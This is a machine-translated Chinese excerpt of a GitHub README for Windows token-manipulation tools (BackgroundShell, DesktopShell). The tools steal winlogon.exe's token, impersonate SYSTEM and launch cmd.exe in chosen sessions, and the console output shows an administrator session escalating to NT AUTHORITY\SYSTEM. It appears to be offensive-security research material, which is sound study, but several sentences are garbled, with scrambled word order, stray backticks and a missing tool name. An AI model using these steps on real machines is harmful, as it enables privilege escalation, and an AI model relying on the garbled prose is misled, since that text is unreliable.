创建 GUI 会话进程
在存在 DLL 劫持或 SYSTEM 特权服务配置修改等漏洞的情况下,加载的 PE 文件将从后台会话执行。此工具演示如何从后台进程获取 GUI 会话进程。为了测试会话 ID 操作,我编写了可执行格式的工具,名为
DesktopShell。但是后台会话进程很难调试,所以我编写了一个名为 的工具来使用和来BackgroundShell创建会话0shell 。SeTcbPrivilege``SeAssignPrimaryTokenPrivilegePS C:\Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobj\user S-1-5-21-1955100404-698441589-1496171011-1001
PS C:\Dev> whoami /groups | findstr /i level
Mandatory Label\High Mandatory Level Label S-1-16-12288
PS C:\Dev> .\BackgroundShell.exe
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from winlogon.exe (Handle = 0x2D4).
[+] Got a impersonation token from winlogon.exe (Handle = 0x2DC).
[+] Current session ID is 1.
[+] Impersonation as winlogon.exe is successful.
[+] Token session ID is updated from 1 to 0 successfully.
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:\Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
C:\Dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ============================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Disabled
DesktopShell实现两种方法来创建cmd.exe流程。
C:\Dev>.\DesktopShell.exe
Usage: DesktopShell.exe <0 or 1>
如果设置了0,它将仅仅cmd.exe使用API 执行,并且会话过程中不会出现CreateProcessGUI,如下所示:cmd.exe``0
C:\Dev>DesktopShell.exe 0
[>] Simply executing CreateProcess().
[+] C:\Windows\system32\cmd.exe is executed successfully (PID: 9496).
设置后1,它将尝试查找 GUI 会话 ID、启用SeTcbPrivilege并SeAssignPrimaryTokenPrivilege复制进程令牌、将 GUI 会话 ID 设置为重复的令牌并cmd.exe使用该令牌创建进程:
C:\Dev>DesktopShell.exe 1
[>] Trying to create desktop shell.
[+] SeTcbPrivilege is enabled successfully.
[+] GUI session ID is 1.
[+] Current token is opened successfully.
[+] Current token is duplicated successfully (Handle = 0x2F0).
[+] Token Session ID is updated successfully.
[+] C:\Windows\system32\cmd.exe is executed in desktop session (PID: 10684).
[*] Done.
如果要检查 DLL 版本,请使用DesktopShellLib。它导出GetShell仅供 执行的函数cmd.exe,CreateProcess以及供在 GUI 会话中GetDesktopShell执行的函数。cmd.exe
以上为截取原文部分,原文请看:https://github.com/daem0nc0re/PrivFu/tree/main/PowerOfTcb
